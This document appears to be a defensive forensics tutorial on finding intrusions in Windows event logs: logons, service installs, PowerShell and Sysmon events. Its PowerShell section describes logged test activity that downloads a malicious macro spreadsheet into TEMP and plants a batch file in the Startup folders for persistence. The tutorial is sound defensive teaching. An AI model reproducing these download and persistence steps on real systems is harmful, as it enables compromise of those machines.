# Uncover Malicious Activity with Windows Event Log Analysis ## Windows Event Logs Overview Uncovering malicious activity with **Windows Event Log Analysis** involves examining specific logs to identify abnormal behaviors, trace attackers' activities, and understand the scope of an incident. **Path:** `C:\Windows\System32\winevt\logs` The target system logs are located at:\ `C:\Cases\E\Windows\System32\winevt\logs`

We can see our logs using Event Viewer.

## Analyzing Windows Event Logs with EventLogExplorer and EvtxECmd Let's open the Application.evtx log file in EventLogExplorer.

Let’s explore what can be achieved with this tool.

We can filter logs by Event ID, description text, time frame, and other criteria. We can also use the EvtxCmd tool to analyze all event logs from the target system. ```bash EvtxECmd.exe -d C:\Cases\E\Windows\System32\winevt\logs --csv C:\Cases\Analysis\EventLogs ```

Let's open this file using Timeline Explorer.

We can sort or filter using any of these columns.

## Windows Defender event Log Analysis Windows Defender, part of the built-in security suite in Windows, generates logs that provide detailed information about security-related activities on the system. These logs can be critical for detecting malicious behavior, monitoring threats, and troubleshooting security issues. Windows Defender logs events related to malware detection, scan results, real-time protection, and updates.

Source	Event ID	Description
Microsoft-Windows-Windows-Defender	5000	Defender Enabled
Microsoft-Windows-Windows-Defender	5001	Defender Disabled

## Analyzing Service Installs When a new service is installed or modified on a Windows system, it generates event logs that can provide valuable information about the service's installation, configuration, and any changes made. By analyzing these event logs, you can detect malicious activities, unauthorized service installations, or changes to legitimate services. **Event ID:** 7045 (A new service was installed) Let's open System.evtx log file using Event Log Explorer.

Let's filter by Event Id 7045.

## Security Event Log and Authentication Events The **Security Event Log** on Windows systems records significant security-related events, including user logons, logoff activities, authentication attempts, and account management actions. Analyzing these events helps to detect potential security incidents such as unauthorized access, privilege escalation, or lateral movement within a network. **Event ID:** 4624 (Successful Logon) Let's open the Security.evtx log file in Event Log Explorer and filter by Event ID 4624.

The **Security ID (SID)** is a unique identifier assigned to a user, group, or computer account in Windows. It is used internally by the operating system to manage access to resources and track actions performed by specific accounts. * `S-1-5-18`: Local System account. * `S-1-5-19`: Local Service account. * `S-1-5-20`: Network Service account. **Logon types** describe how a user accessed the system. They are crucial for identifying the nature of an authentication event.

Logon Type	Description	Use Case
2	Interactive	Physical logon at a system (e.g., console).
3	Network	Access via network (e.g., SMB, web access).
10	RemoteInteractive	RDP or Terminal Services logon.

Let's filter by Account Name Sec504.

## Authentication Events and Logon IDs **Logon ID** is a unique hexadecimal identifier that correlates logon sessions across multiple event logs. When you log in to a Windows system, it is common to see two logon hexadecimal IDs generated: one for a **low-privilege session** and another for a **higher-privilege session**. This behavior occurs because Windows uses **User Account Control (UAC)** to manage privilege levels for interactive logins. * **Low-Privilege Logon ID**: * When you log in interactively, Windows first creates a standard user session by default, even if you are an administrator. * This session operates under a **low-privilege token** to reduce the risk of accidental or malicious changes to the system. * It is associated with a **Logon Type 2** (Interactive Logon). * **High-Privilege Logon ID**: * If you perform an action that requires administrative rights (e.g., running a program as an administrator), UAC creates a second session with a **high-privilege token**. * This session is linked to your account but is treated as a separate process requiring explicit elevation. * This elevated session will have its own **Logon ID**.

Logon IDs play a crucial role in forensic investigations by enabling analysts to correlate different activities and actions performed during a specific session. Let's review the actions associated with Logon ID **0xe64e2**.

Let's review the actions associated with Logon ID **0xe64b4**.

We can see that a new user has been added to the Administrators group. ## PowerShell Event Logs Overview PowerShell provides detailed logging of its activities, which can be very useful in forensic investigations, especially when analyzing the execution of malicious scripts or tracking administrative activities. The logs capture events related to PowerShell script executions, command usage, and PowerShell module activities. These logs are particularly valuable for detecting malicious activity, lateral movement, or misuse of PowerShell for post-exploitation activities. **Event ID:** 400 (Engine state is changed from none to available) * This event logs the start of a PowerShell script execution. It includes: * **CommandLine**: The PowerShell command or script that was run. * **User**: The user who initiated the command. * **ScriptPath**: The location of the script, if applicable. * **Use Case**: You can use this event to track the start of potentially malicious PowerShell scripts on the system. **Event ID:** 403 (PowerShell script ended) * This event logs the completion of a PowerShell script execution. It records: * **Exit Code**: The exit status of the script (successful or error). * **Duration**: The time taken for the script to execute. * **Use Case**: Investigating the completion of PowerShell scripts, especially if the exit code indicates a failure or error during execution. Two files are available. Let's load them into Event Log Explorer.

The **HostApplication** field in PowerShell event logs refers to the application that is running the PowerShell script or command. It helps identify which process is executing the PowerShell command. In the context of your example: * **HostApplication**: `powershell.exe` * This indicates that the PowerShell command is being executed from the **PowerShell** executable, meaning that a standard PowerShell process is running the command. * **Command**: `{Remove-Item -path $env:TEMP\deleteme_T1551.004}` * This is the PowerShell command being executed. In this case, the command is attempting to remove a file named `deleteme_T1551.004` located in the `TEMP` directory.

Regularly monitor Event ID 4104 to detect potentially malicious commands being executed in your environment, especially from non-administrative users or unexpected processes. If a system is compromised, Event ID 4104 will show what scripts or commands were executed by the attacker, helping you trace their activity.

This command runs a PowerShell script that: 1. Sets the variable `$url` to the location of a malicious Excel file (`PhishingAttachment.xlsm`) hosted on GitHub. 2. Configures the PowerShell session to use **TLS 1.2** for secure communication (`[Net.ServicePointManager]::SecurityProtocol`). 3. Uses `Invoke-WebRequest` to download the malicious Excel file from the URL and saves it to the system's **TEMP** directory with the name `PhishingAttachment.xlsm`. This type of command is typically used in phishing attacks, where a malicious file is downloaded and potentially executed to compromise the system.

Here's a brief explanation of what it does: 1. **Copying the Batch File**: * It copies the file `batstartup.bat` from the source directory (`C:\AtomicRedTeam\atomics\T1547.001\src\batstartup.bat`) to two startup locations: * `$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat` (for the current user). * `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat` (for all users). 2. **Executing the Batch File**: * It uses `Start-Process` to run the batch file from both startup locations. This ensures that the batch file is executed every time the system starts, maintaining persistence. ## Detecting Malicious Events in Sysmon Event Logs Detecting malicious activity in Sysmon logs involves analyzing specific event IDs and correlating patterns of suspicious behavior. Sysmon, or **System Monitor**, provides detailed information about system activity that can be used to detect anomalies and threats. * **Event ID 1: Process Creation** * Logs every process start, including command-line arguments. * **Event ID 3: Network Connection** * Logs TCP/UDP connections made by processes. * **Event ID 7: Image Load** * Detects DLL injection or unusual libraries loaded into processes. * **Event ID 8: CreateRemoteThread** * Tracks threads created in the address space of another process. * **Event ID 11: File Creation** * Monitors file creation activities. * **Event ID 12 & 13: Registry Key and Value Changes** * Tracks changes to the registry. * **Event ID 22: DNS Query** * Logs DNS requests made by processes. Let's open the "Microsoft-Windows-Sysmon" file and filter by Event ID 1 and the keyword "mavinject."

Let's filter for Event ID 3 to analyze network connections.